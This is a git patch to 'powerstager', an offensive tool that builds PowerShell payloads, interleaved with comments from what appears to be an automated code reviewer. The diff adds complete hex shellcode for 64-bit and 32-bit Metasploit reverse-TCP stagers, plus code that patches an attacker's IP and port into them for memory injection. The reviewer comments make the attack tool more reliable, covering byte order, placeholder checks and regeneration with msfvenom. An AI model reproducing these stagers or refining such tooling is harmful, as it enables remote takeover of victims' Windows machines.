From b0201c80008253e6682ff964960a80feb51629a5 Mon Sep 17 00:00:00 2001 From: z0noxz Date: Fri, 9 Jun 2017 12:16:49 +0200 Subject: [PATCH] Fix for broken 32bit shellcode and mingw-compile (ISSUE #8) --- powerstager/powerstager.py | 66 +++++++++++++++++++++++++++++--------- 1 file changed, 51 insertions(+), 15 deletions(-) diff --git a/powerstager/powerstager.py b/powerstager/powerstager.py index 11f05b8..55dfbc1 100755 --- a/powerstager/powerstager.py +++ b/powerstager/powerstager.py @@ -283,10 +283,24 @@ class Utility(object): lhost = [byte for byte in lhost if byte >= 0 and byte <= 255] lport = int(lport) if len(lhost) == 4 and lport > 0 and lport <= 65535: - return ",".join(hex(b) for b in (list(Utility.binary_array_string(lport))[::-1] + list(Utility.binary_array_string(lhost[0])) + list(Utility.binary_array_string(lhost[1])) + list(Utility.binary_array_string(lhost[2])) + list(Utility.binary_array_string(lhost[3])))) + return (",".join(hex(b) for b in list(Utility.binary_array_string(lport))[::-1]), (",".join(hex(b) for b in (list(Utility.binary_array_string(lhost[0])) + list(Utility.binary_array_string(lhost[1])) + list(Utility.binary_array_string(lhost[2])) + list(Utility.binary_array_string(lhost[3])))))) except: Print.error("There is something wrong with the LHOST and LPORT") sys.exit(2) + + + @staticmethod + def replace_all(string, target, replacement): + + target = list(target) + replacement = list(replacement) + + for i in range(len(target)): + if (i > (len(replacement) - 1)): + break + string = string.replace(target[i], replacement[i]) + + return string @staticmethod def load_configuration(configuration): @@ -446,11 +460,11 @@ powershell_block = Utility.enum( ) -memory_injection_payload = Utility.enum( - METERPRETER = "meterpreter", +shellcode = Utility.enum( + REVERSE_TCP_64 = "reverse_tcp_64", + REVERSE_TCP_32 = "reverse_tcp_32", ) - # Placeholder values for powershell blocks with obfuscation techniques obfuscation = { 
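Review bot: `Utility.replace_all` silently stops substituting when `replacement` is shorter than `target` (the `break` in the loop), so a caller that passes two placeholders but one value gets a shellcode string with a literal `[_LHOST_]` still in it, and nothing downstream in this hunk notices; a length mismatch should be an error, not a partial result. The same hunk changes `local_address_to_binary_array_string` to return a `(port, host)` tuple whose order the caller must match by position, so making the mismatch loud matters here. The bare `except:` around the address parsing, which maps every failure (including a typo in the new tuple expression) to the LHOST/LPORT message, is pre-existing context but would hide exactly that kind of bug. I would rewrite the helper as below; `load_configuration` and the rest of `Utility` lie outside the hunk.
```python
    @staticmethod
    def replace_all(string, target, replacement):
        """Replace each placeholder in `target` with the same-index entry of `replacement`.

        Raises ValueError when the two sequences differ in length, so a placeholder
        can never be left unexpanded in generated shellcode.
        """
        if len(target) != len(replacement):
            raise ValueError("replace_all: %d placeholders but %d values" % (len(target), len(replacement)))
        for old, new in zip(target, replacement):
            string = string.replace(old, new)
        return string
```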
@@ -701,7 +715,7 @@ c_source_mb = """ c_source = """#include #include -int WinMain( +int WINAPI WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, @@ -747,7 +761,7 @@ c_source_embedded = """#define _CRT_SECURE_NO_DEPRECATE #include #include -int WinMain( +int WINAPI WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, @@ -837,9 +851,10 @@ powershell_blocks = { } # Payloads prepared for memory injection -memory_injection_payloads = { - # metasploit stager for meterpreter. This also works with vncinjection on W7 (but fails on W10) - memory_injection_payload.METERPRETER +shellcodes = { + + # reverse_tcp stager stager for metasploit. + shellcode.REVERSE_TCP_64 : "0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51," + "0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52," + "0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0," 
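Review bot: Adding `WINAPI` fixes the calling convention, but the prototype the hunk leaves in place still declares the third parameter as `LPTSTR lpCmdLine`; the `WinMain` entry point is declared by the Windows headers with `LPSTR` regardless of `UNICODE` (the wide variant is `wWinMain`), so a build that defines `UNICODE`/`_UNICODE` will presumably still fail with conflicting types under mingw. I would change that context line to `LPSTR lpCmdLine,` in both `c_source` and `c_source_embedded` (the same signature appears in the next hunk). The C templates are string literals whose bodies continue outside the hunk.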
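Review bot: The new `shellcodes` entry carries an opaque byte blob with only `# reverse_tcp stager stager for metasploit.` (note the doubled word) to say where it came from; for a hard-coded stager that the tool injects into memory, the comment should record the exact payload name and generating command (the `msfvenom -p ... -f c` line and the framework version) so the bytes can be regenerated and audited rather than trusted as pasted. I would replace the comment with `# windows/x64/meterpreter/reverse_tcp stager; regenerate with msfvenom -p <payload> LHOST=0.0.0.0 LPORT=0 -f c (placeholders patched in by replace_all)`, adjusting the payload name to whatever actually produced these bytes. The `shellcodes` dict and the blob continue into the next hunk.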
@@ -869,6 +884,26 @@ memory_injection_payloads = { + "0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8," + "0x5f,0xff,0xd5,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xe1,0x41,0xff," + "0xe7", + + shellcode.REVERSE_TCP_32 + : "0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b," + + "0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c," + + "0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52," + + "0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20," + + "0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac," + + "0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75," + + "0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3," + + "0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff," + + "0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77," + + "0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00," + + "0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x68,[_LHOST_]," # << LHOST gets declared here as 4 bytes + + "0x68,0x02,0x00,[_LPORT_],0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68," # << LPORT gets declared here as 2 bytes + + "0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61," + + "0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56," + + "0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b," + + "0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5," + + "0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5," + + "0x1,0xc3,0x29,0xc6,0x75,0xee,0xc3", } 
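Review bot: The inline comments on the `[_LHOST_]` and `[_LPORT_]` lines give the byte counts but not the byte order, and the order is the part that breaks silently: `0x68,0x02,0x00,[_LPORT_]` appears to be a `push imm32` building the `sockaddr_in` (`AF_INET` then `sin_port`), so the two port bytes must be big-endian (network order), which is presumably why `local_address_to_binary_array_string` reverses them with `[::-1]`. Because substitution is textual, expanding either placeholder to the wrong number of bytes shifts every following opcode without any error. I would extend the comments to `# << LPORT: exactly 2 bytes, network byte order (sin_port); any other length corrupts the instruction stream` and `# << LHOST: exactly 4 bytes, dotted-quad order (sin_addr)`. Minor consistency nit: the last line writes `0x1` where every other byte uses two digits (`0x01`).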
@@ -1447,11 +1482,12 @@ class Listener(object): if payload_type == conf_name.METERPRETER: payload = generate_injection( - memory_injection_payloads[memory_injection_payload.METERPRETER].replace( - "[_LPORT_],[_LHOST_]", + Utility.replace_all( + shellcodes[(shellcode.REVERSE_TCP_32 if self.os_target == os_target.WIN32 else shellcode.REVERSE_TCP_64)], + ("[_LPORT_]", "[_LHOST_]"), Utility.local_address_to_binary_array_string(lhost, lport) ), self.os_target - ).encode("utf8") + ).encode("utf8") elif payload_type == conf_name.REVERSE_SHELL: payload = generate_reverse_shell(lhost, lport).encode("utf8") @@ -2379,7 +2415,6 @@ def generate_reverse_shell(lhost, lport): # Generates injection payload powershell block # Generates injection payloads either from templates or from path def generate_injection_payload(): - global memory_injection_payloads # Create an empty holder for an embedded payload payload_embedded = "" @@ -2392,8 +2427,9 @@ def generate_injection_payload(): elif Utility.get_configuration_value(conf_name.METERPRETER): payload_embedded = Utility.ps_base64encode( generate_injection( - memory_injection_payloads[memory_injection_payload.METERPRETER].replace( - "[_LPORT_],[_LHOST_]", + Utility.replace_all( + shellcodes[(shellcode.REVERSE_TCP_32 if Utility.get_configuration_value(conf_name.TARGET) == os_target.WIN32 else shellcode.REVERSE_TCP_64)], + ("[_LPORT_]", "[_LHOST_]"), Utility.local_address_to_binary_array_string(Utility.get_configuration_value(conf_name.LHOST), Utility.get_configuration_value(conf_name.LPORT)) ), Utility.get_configuration_value(conf_name.TARGET) )
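Review bot: The placeholder tuple `("[_LPORT_]", "[_LHOST_]")` is paired purely by position with the tuple that `Utility.local_address_to_binary_array_string(lhost, lport)` returns; nothing in either call names which value belongs to which placeholder, so swapping either side still yields a well-formed byte string that connects to the wrong endpoint with no error. I would have the helper return a mapping and iterate it, e.g. `subs = {"[_LPORT_]": port_bytes, "[_LHOST_]": host_bytes}` with `for placeholder, value in subs.items(): sc = sc.replace(placeholder, value)`, or at minimum check afterwards with `if "[_" in sc: raise ValueError("unexpanded shellcode placeholder")`. The `Listener` method this sits in starts before the hunk.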
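Review bot: The shellcode selection expression `shellcodes[(shellcode.REVERSE_TCP_32 if ... == os_target.WIN32 else shellcode.REVERSE_TCP_64)]` is now duplicated here and in the `Listener` hunk above, differing only in where the target comes from, so the next change to how targets map to stagers has to be made twice. I would factor it into one module-level helper, `def select_shellcode(target): return shellcodes[shellcode.REVERSE_TCP_32 if target == os_target.WIN32 else shellcode.REVERSE_TCP_64]`, and call it from both sites. Note that any target value other than `WIN32` falls through to the 64-bit stager; if `os_target` can hold more than two values that default deserves an explicit branch or error. `generate_injection_payload` continues outside the hunk.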